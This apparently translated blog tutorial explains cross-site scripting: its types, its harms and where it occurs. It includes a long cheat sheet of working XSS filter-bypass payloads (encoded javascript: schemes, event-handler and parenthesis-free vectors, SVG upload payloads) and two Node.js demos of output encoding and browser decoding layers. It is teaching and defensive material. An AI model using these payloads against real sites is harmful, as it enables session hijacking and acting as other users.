[Original] Summary of XSS attacks

Table of contents

1. XSS definition

2. The harm of XSS

3. XSS classification

4. Places where vulnerabilities may occur

5. Attack methods

6. Character encoding and browser parsing principles


1. XSS definition

The formation principle of xss

The Chinese name of XSS translates to "cross-site scripting attack"; the English name is "Cross-Site Scripting".

The natural abbreviation would have been CSS, but CSS was already widely used in web design for Cascading Style Sheets, so "Cross" was replaced by a cross-shaped X. The principle: an attacker feeds malicious script code (HTML, JavaScript) into a website that has an XSS vulnerability; when other users visit the page that now contains the malicious code, the browser parses and executes it, and the attacker's goal is achieved. In theory, every input location whose data is not processed before it is written back to a page is an XSS vulnerability. How much harm the vulnerability does depends on how powerful the injected code is, and that code is not limited to script tags.

XSS attacks usually exploit flaws left behind during web development to inject malicious instructions into a web page, so that users' browsers load and execute content crafted by the attacker. This content is usually JavaScript, but it can also be Java, VBScript, ActiveX, Flash or even plain HTML. After a successful attack the attacker may act with the victim's privileges (performing operations as the user), read private page content, and steal sessions, cookies and similar data.

Root causes

1. There are no constraints on the input and no encoding of the output.

2. There is no strict distinction between “data” and “code”
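To make the two root causes concrete, here is an added example (not code from the original article) in Node.js: a comment renderer that concatenates user data straight into HTML, beside a version that encodes its output for the HTML text and attribute contexts and validates the link's scheme. The attacker strings and the placeholder base URL https://example.invalid/ are constructed for the demonstration.

```javascript
// Added example (not code from the original article): the two root causes above,
// shown as a comment renderer that concatenates user data into HTML beside one
// that encodes output and validates the URL. Plain Node.js, no dependencies.

// Constructed attacker input, standing in for a stored comment and a profile URL.
const EVIL_COMMENT = '<img src=x onerror=alert(document.cookie)>';
const EVIL_LINK = 'javascript:alert(1)';

// Vulnerable: no constraint on input, no encoding of output. The browser has
// no way to tell the attacker's markup from the page's own markup.
function renderCommentUnsafe(author, body, homepage) {
  return `<div class="comment"><a href="${homepage}">${author}</a>: ${body}</div>`;
}

// Output encoding for HTML text and quoted-attribute contexts: the five
// characters that can end a text node or a quoted attribute value.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(str).replace(/[&<>"']/g, (c) => map[c]);
}

// A URL attribute needs a different check: "javascript:alert(1)" contains none of
// the five characters above, so escapeHtml leaves it intact. Browsers strip ASCII
// tab, LF and CR from a URL before reading its scheme, so strip them first, then
// accept only http(s). The base URL is a placeholder used only to resolve relative links.
function safeUrl(url) {
  const cleaned = String(url).replace(/[\t\n\r]/g, '').trim();
  try {
    const parsed = new URL(cleaned, 'https://example.invalid/');
    if (parsed.protocol === 'http:' || parsed.protocol === 'https:') return cleaned;
  } catch (e) {
    // not a parseable URL: fall through to the neutral value
  }
  return 'about:blank';
}

// Hardened: every piece of data is encoded for the context it lands in.
function renderCommentSafe(author, body, homepage) {
  return `<div class="comment"><a href="${escapeHtml(safeUrl(homepage))}">` +
    `${escapeHtml(author)}</a>: ${escapeHtml(body)}</div>`;
}

console.log(renderCommentUnsafe('bob', EVIL_COMMENT, EVIL_LINK));
console.log(renderCommentSafe('bob', EVIL_COMMENT, EVIL_LINK));
```

Run it with node: the first line of output is the live payload, the second is the same comment with the markup neutralised and the link replaced by about:blank. escapeHtml is a context-specific control; it is correct inside a text node or a quoted attribute, while a URL attribute, an event handler or a script block each need their own treatment, which is the point section 6 develops.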

2. The harm of XSS

1. The user's cookie is stolen. It may contain sensitive data such as the session ID; if the server does nothing to protect it (for example marking the session cookie HttpOnly so that script cannot read it), the attacker can replay the cookie and act as the logged-in user.

2. The attacker can record the user's keyboard input, within the limits of the page the script runs in.

3. The attacker performs dangerous operations as the user, for example by issuing CSRF-style requests from the injected script, which carry the user's cookies automatically.

4. XSS worm.

5. Obtain user browser information.

6. Use XSS vulnerabilities to scan the user's intranet.

3. XSS classification

(1) Stored XSS

In stored XSS the malicious code is saved on the server (database or file system) and later read back and rendered, which produces the XSS.

The attacker does not need to construct a URL; the payload is submitted once, for example in an article or a forum post, and every user who later views that page is attacked. It is also called "persistent XSS". Persistent XSS is generally far more harmful than reflected XSS, because it hits every visitor with no interaction beyond loading the page.

(2) Reflected XSS

Reflected XSS generally does not store the data anywhere; the server simply echoes a request parameter straight back into the response.

Reflected XSS is also known as "non-persistent XSS".

The most direct form is to construct a URL and trick a user into clicking it: the parameter value carried in the URL is displayed on the page immediately, without any filtering or escaping. Another common case is injecting a script through a search box whose query is echoed on the results page.

(3) DOM-based XSS

In one sentence: a DOM-based XSS vulnerability lives in the client-side handling of the Document Object Model (DOM), not in the server's response.

DOM (Document Object Model)

The DOM is an object-oriented model of a document and the standard way of representing and manipulating an HTML or XML document.

It defines the objects needed to represent and modify the document, the behaviour and properties of those objects, and the relationships between them.

You can think of the DOM as a tree representation of the data and structure of the page.

DOM-based XSS is caused by client-side JavaScript that handles document objects and URL values unsafely.

Any script that reads a value from the URL (or another source the attacker controls, such as location.hash) and writes it into the page, for example through innerHTML or document.write, is an easy target.

What distinguishes DOM-based XSS is that it generally has nothing to do with how the server parses or renders the response; the injection happens while JavaScript executes dynamically in the browser.

4. Places where vulnerabilities may occur

search bar

User login portal

message board

Comment

Blog log

error page

Pages with no obvious input parameter can also be attacked, if something the server echoes (for example the request path or a request header) is under the attacker's control.

To find them:

Find every entry point that accepts user input.

Track each piece of data as it flows through the application.

Determine whether the data reaches any output.

If it does, is it written out raw, or is it processed (encoded or filtered) first, and for which output context?

5. Attack methods

Different ways to write the character <, one for each layer that may decode it:

<   the raw character

%3C   URL encoding (double URL encoding: %253C, for input that is URL-decoded twice)

&#60;   HTML decimal character reference (the semicolon can be omitted, and leading zeros can be added: &#0060)

&#x3c;   HTML hexadecimal character reference

\74   JS octal escape (inside string literals only; not allowed in strict mode or in template literals)

\x3c   JS hexadecimal escape

\u003c   JS Unicode escape

PA==   base64 encoding


Commonly used payloads

<svg onload=alert('111')>

<img src=1 onerror=alert(`222`)>

<marquee onmouseover=alert(/333/)>aaa</marquee>

<a href=javascript:alert(/555/)>M</a>

<body onload=alert(/666/)>

Case bypass

<sCrIpT>alert(1)</ScRiPt>

<ImG src=1 OnErRoR=alert(1)>

Various pop-up forms (pop-up, link injection, frame injection)

<script>alert(1)</script>

<script>alert('1')</script>

<script>alert("1")</script>

<script>alert`1`</script>

<script>(alert)(1)</script>

<script>confirm(2)</script>

<script>prompt(3)</script>

<script>a=alert,a(1)</script>

<script>[1].find(alert)</script>, or as a URL: javascript:[1].find(alert)

<script>top["al"+"ert"](1)</script>

<script>top[/al/.source+/ert/.source](111)</script>

<script>top.open`javas\script:al\ert(999)`</script>---opens a new window; inside a template literal \s and \e are simply "s" and "e"

<video src=1 onloadstart=print(1)>---opens the print dialog

<script>\u0061\u006C\u0065\u0072\u0074(555)</script>---Unicode escapes inside an identifier; decodes to alert

<script>alert(String.fromCharCode(51,51,51))</script>---alert("333")

<body onload=prompt(2);>

<body onpageshow=alert(1)>

<style/onload=alert(3)>

<select autofocus onfocus=alert(1)>

<video><source onerror="javascript:alert(1)">

<a> tag

<a href="javascript:alert(1)">Clickme</a>

<a href="javascript:alert`1`">11</a>

<a href=//www.baidu.com>

<a href="http://www.baidu.com">xss</a>

<a onmouseover=alert(333)>222

<a onclick=alert(333)>333

Do not use quotes

<a href=javascript:1,alert(111)>aaa</a>

<a href=javascript:alert(222)>aaa</a>

Use single quotes instead of double quotes

<a href='javascrip&#116&#58alert(3)'>Clickme</a>

Use / instead of a space

<img/src=x onerror=prompt(33    );>

Whitespace: space, newline, tab

<a href="java    script:alert(2)">Clickme</a>---a tab inside the scheme; the URL parser strips it

Keyword splitting techniques

Unclosed tag

<svg onload=alert(33)//

<svg onload="alert(333)"

Encoded tag attribute values

<a href="javascrip&#116&#58alert(3)">Clickme</a>

Tab, line feed and carriage return characters (or their character references) can also be inserted at the start of the javascript: scheme, because the URL parser strips them before reading the scheme; they can likewise be inserted anywhere else in the value.

<a href="javascript:alert(4)">Clickme</a>(when using character references, terminate them with semicolons)

Parentheses not allowed

<script/x>alert`1`</script>---a filter looking for "<script>" may miss this variant because it does not check for extra attributes; the template literal call supplies the argument without parentheses

<script/x>setTimeout`alert\x2811\x29`</script>---\x28 and \x29 are JS hexadecimal escapes for ( and ); the template literal decodes them into the string "alert(11)" before setTimeout evaluates it

<script/x>setInterval`alert\x2822\x29`</script>

<svg onload=alert&#40;1&#41;>---HTML decimal character references for ( and ), decoded by the HTML parser before the handler is compiled

<img src=x onerror="javascript:window.onerror=alert;throw 1">---inside an event handler "javascript:" is just a label; the uncaught exception reaches alert through window.onerror

<body/onload=javascript:window.onerror=eval;throw&#039;=alert\x281\x29&#039;;>---the thrown string arrives at eval as the error message "Uncaught =alert(1)", which is valid JavaScript

File upload injection --- file name

Used when the uploaded file's name is reflected somewhere on the target page:

"><svg onload=alert(1)>.gif

File upload injection --- SVG files, images, HTML/JS files, etc.

To create a stored XSS on the target through file upload, save the following as xss.svg (it only fires when the browser navigates to the file directly and the server serves it with an SVG or HTML content type, not when the file is embedded through <img>):

<svg onload="alert(1)"/>

xss.gif

<img src=xx:x onerror=alert(1)//">

Scrolling "universal" XSS vector

<p style=overflow:auto;font-size:999px onscroll=alert(1)>aaa</p>

<img> tag

<img src=x οnerrοr=prompt(1);> 

<iframe> tag

Malicious URLs are run through various encodings to make them harder to recognise.

<iframe/src="data:text/html;base64,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

After decoding: <body onload=alert(1)>

<iframe src="javascript:alert('xss');"></iframe>

<iframe src=javascript:alert(111)>

<iframe/onload=alert(1)>

<IFRAME SRC=javascript:alert(String.fromCharCode(72,69,76,76,79))>

---String.fromCharCode(72,69,76,76,79) evaluates to "HELLO", so this is alert("HELLO")

<iframe src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

---HTML hexadecimal character references with the semicolons omitted; the HTML parser decodes them to javascript:alert('XSS')

form tag

<form action="Javascript:alert(1)"><input type=submit>

<form onsubmit=alert(333)><button>

<form><button formaction=javascript:alert(1)>M

<form><input formaction=javascript:alert(1) type=submit>

<form><input formaction=javascript:alert(1) type=image>

svg tag

<svg/onload=prompt(1);>

<input> tag

<input autofocus onfocus=alert(333)>

Triggering XSS in an input with type="hidden"

A hidden input is not rendered, so it receives no focus or mouse events, but an accesskey attribute still works on it:

http://victim/?returnurl=" accesskey="X" onclick="alert(document.domain)

In Firefox, for example, Alt+Shift+X then fires the handler:

<input type="hidden" accesskey="X" onclick="alert(1)">

<INPUT SRC="javascript:alert('XSS');"> (legacy vector: current browsers do not execute javascript: URLs in a src attribute)

<embed> tag, which can embed a Flash file containing XSS (historical; Flash reached end of life at the end of 2020)

<embed src="http://3w.org/XSS/xss.swf"></embed>

<embed src='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></embed>

HTML entity bypass

If the target page places input inside a srcdoc attribute, HTML-entity-encoded input is decoded when the iframe's document is parsed, so entity encoding does not neutralise it:

<iframe srcdoc="&lt;script&gt;alert(1);&lt;/script&gt;"></iframe>

HTML5 named character references

&colon; => : (colon)

&NewLine; => line feed

<a href="javasc&NewLine;ript&colon;alert(1)">click</a>

(The HTML parser decodes the entities; the URL parser then strips the line feed and sees a literal javascript: scheme.)

6. Character encoding and browser parsing principles

(Based on part 6 of "A brief discussion of XSS: character encoding and browser parsing principles", Q1n6, CSDN blog)

Whatever order the browser follows when parsing an HTML document, three processes are involved: HTML parsing, JavaScript parsing and URL parsing. Each parser handles the part of the document that belongs to it.

<a href="javascript:alert(3)">aaa</a>

Consider how the browser processes the a tag above.

First the HTML parser runs and HTML-decodes the characters in the href attribute value. Next the URL parser parses the href value. Normally the value is an ordinary link such as https://www.xxx.com, and nothing further needs decoding once the URL parser is done; here, however, the URL's resource type is JavaScript, so the JavaScript parser performs one more decoding step and the resulting script is executed.

The whole sequence is therefore three stages: HTML decoding, URL decoding, JavaScript decoding.

Test 1

URL-encode "javascript:alert(1)" = "%6A%61%76%61%73%63%72%69%70%74:%61%6C%65%72%74%28%31%29"

Placed in the href, the script is not executed. The URL parser does not percent-decode the scheme when deciding what kind of URL it is looking at: a URL whose scheme is percent-encoded has no recognisable scheme, so the encoded "javascript" is never decoded and treated as a protocol, and the value is handled as an ordinary relative path.

Test 2

HTML-entity-encode "javascript", URL-encode "alert(2)":

HTML encoding of "javascript" = "javascri&#112;t"

URL encoding of "alert(2)" = "%61%6C%65%72%74%28%32%29"

Executes normally: the HTML parser restores the literal scheme, the URL parser recognises javascript: and percent-decodes the remainder, and the JavaScript parser receives alert(2).

Test 3

Apply JS encoding, then URL encoding, then HTML encoding to <a href="javascript:alert(3)">test3</a>, three layers in total (only "alert" is JS-encoded and URL-encoded; the scheme stays literal, for the reason seen in test 1):

JS encoding: <a href="javascript:\u0061\u006c\u0065\u0072\u0074(3)">test3</a>

URL encoding: <a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(3)">test3</a>

HTML encoding: <a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#37;&#53;&#99;&#37;&#55;&#53;&#37;&#51;&#48;&#37;&#51;&#48;&#37;&#51;&#54;&#37;&#51;&#49;&#37;&#53;&#99;&#37;&#55;&#53;&#37;&#51;&#48;&#37;&#51;&#48;&#37;&#51;&#54;&#37;&#54;&#51;&#37;&#53;&#99;&#37;&#55;&#53;&#37;&#51;&#48;&#37;&#51;&#48;&#37;&#51;&#54;&#37;&#51;&#53;&#37;&#53;&#99;&#37;&#55;&#53;&#37;&#51;&#48;&#37;&#51;&#48;&#37;&#51;&#55;&#37;&#51;&#50;&#37;&#53;&#99;&#37;&#55;&#53;&#37;&#51;&#48;&#37;&#51;&#48;&#37;&#51;&#55;&#37;&#51;&#52;&#40;&#51;&#41;">test3</a>

Executes normally.

The HTML parser turns the character references back into javascript:%5c%75...(3); the URL parser recognises the javascript: scheme and percent-decodes the remainder into \u0061\u006c\u0065\u0072\u0074(3); and when the JavaScript parser runs, \u0061\u006c\u0065\u0072\u0074 is decoded into "alert", which is a valid identifier name, so the call resolves and executes.

Syntax characters such as parentheses, double quotes and single quotes, when JS-encoded, only ever decode into literal characters, never into syntax. For example, in <script>alert('YISRC\u0027)</script> the single quote has been JS-encoded as \u0027; when parsed, it becomes a literal apostrophe inside the string, the string literal is never closed, and the script fails with a syntax error.

In short: a payload encoded for a given layer is decoded by that layer's parser and the result is executed, with one exception: encoding the syntax characters that the JavaScript parser itself relies on does not work.
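The code below is an added example (not code from the original article) that models the HTML, then URL, then JavaScript decoding chain just described and reproduces test 1 to test 3, the HTML5 named-entity payload, the "parentheses filtered" payloads from section 5 and the encoded-quote failure case; encodeVariants also produces the eight representations of < listed at the start of section 5. htmlDecode and urlParse are simplified hand-written stand-ins for the browser's HTML and URL parsers (numeric references plus the handful of named references this article uses; tab/LF/CR stripping; literal scheme matching; percent-decoding of javascript: bodies), while the JavaScript layer is Node's own engine through new Function with alert replaced by a stub that records what it was called with. All payload strings are constructed test inputs.

```javascript
// Added example (not code from the original article): a model of the three
// decoding layers that an href="javascript:..." value passes through, HTML -> URL -> JS.
// htmlDecode and urlParse are simplified hand-written stand-ins for the browser's
// parsers; the JS layer is Node's own engine (new Function) with alert stubbed.
// encodeVariants reproduces the eight representations of "<" from section 5.
// Plain Node.js, no dependencies. All payload strings are constructed test inputs.

// The eight ways to write one character listed in section 5.
function encodeVariants(ch) {
  const cp = ch.codePointAt(0);
  const hex = cp.toString(16);
  return {
    url: '%' + hex.toUpperCase().padStart(2, '0'),
    doubleUrl: '%25' + hex.toUpperCase().padStart(2, '0'),
    htmlDec: `&#${cp};`,
    htmlHex: `&#x${hex};`,
    jsOctal: '\\' + cp.toString(8), // string literals only, not in strict mode
    jsHex: '\\x' + hex.padStart(2, '0'),
    jsUnicode: '\\u' + hex.padStart(4, '0'),
    base64: Buffer.from(ch, 'utf8').toString('base64'),
  };
}

// Full percent-encoding and full HTML decimal encoding, used to build test 3.
const percentAll = (s) => [...s].map((c) => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const htmlDecAll = (s) => [...s].map((c) => `&#${c.charCodeAt(0)};`).join('');

// Layer 1: the HTML parser decodes character references inside attribute values.
// Numeric references may be decimal or hex, carry leading zeros, and omit the
// semicolon; named references are limited here to the ones this article uses.
const NAMED = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'", colon: ':', NewLine: '\n', Tab: '\t' };
function htmlDecode(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[A-Za-z]+);?/g, (m, ref) => {
    if (ref[0] !== '#') return ref in NAMED ? NAMED[ref] : m;
    const cp = /^#[xX]/.test(ref) ? parseInt(ref.slice(2), 16) : parseInt(ref.slice(1), 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Layer 2: the URL parser. It removes ASCII tab, LF and CR anywhere in the input and
// trims surrounding whitespace, then reads the scheme literally: "%6a%61..." is not
// a scheme, so test 1 never reaches the JS layer. Only for javascript: URLs is the
// remainder percent-decoded before being handed to the script engine.
function urlParse(s) {
  const cleaned = s.replace(/[\t\n\r]/g, '').trim();
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):([\s\S]*)$/.exec(cleaned);
  if (!m) return { scheme: null, body: cleaned };
  const scheme = m[1].toLowerCase();
  let body = m[2];
  if (scheme === 'javascript') {
    try { body = decodeURIComponent(body); } catch (e) { /* malformed %xx: keep raw */ }
  }
  return { scheme, body };
}

// Layer 3: hand the decoded body to the real JS engine with a recording alert().
// A JS escape for a syntax character (\x28 for "(" or \u0027 for "'") only ever
// yields a literal character, so such payloads fail here with a SyntaxError.
function evaluateHref(href) {
  const { scheme, body } = urlParse(htmlDecode(href));
  if (scheme !== 'javascript') return { executed: false, scheme, body };
  const calls = [];
  try {
    new Function('alert', body)((x) => calls.push(x));
    return { executed: true, body, calls };
  } catch (e) {
    return { executed: false, body, error: e.constructor.name };
  }
}

// Constructed payloads: the article's three tests plus the section 5 cases.
const TESTS = {
  test1_encodedScheme: percentAll('javascript') + ':' + percentAll('alert(1)'),
  test2_htmlScheme_urlBody: 'javascri&#112;t:' + percentAll('alert(2)'),
  test3_threeLayers: htmlDecAll('javascript:' + percentAll('\\u0061\\u006c\\u0065\\u0072\\u0074') + '(3)'),
  html5NamedEntities: 'javasc&NewLine;ript&colon;alert(1)',
  tabInScheme: 'java\tscript:alert(2)',
  decimalParens: 'javascript:alert&#40;1&#41;',
  jsEscapedParens: 'javascript:alert\\x281\\x29',
  jsEscapedQuote: "javascript:alert('YISRC\\u0027)",
};

for (const [name, href] of Object.entries(TESTS)) {
  console.log(name, JSON.stringify(evaluateHref(href)));
}
```

Running it prints one line per payload: test 1 stops at the URL layer with scheme null, tests 2 and 3 and the entity-encoded variants reach alert with their argument intact, and the two payloads that JS-encode a parenthesis or a quote come back with a SyntaxError, which is the exception stated above. The model is deliberately narrower than a real browser (no legacy named references without semicolons, no full URL-spec scheme handling), so treat a "not executed" result here as a hint to re-test in a browser rather than as proof.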


Source: blog.csdn.net/yiran1919/article/details/121559718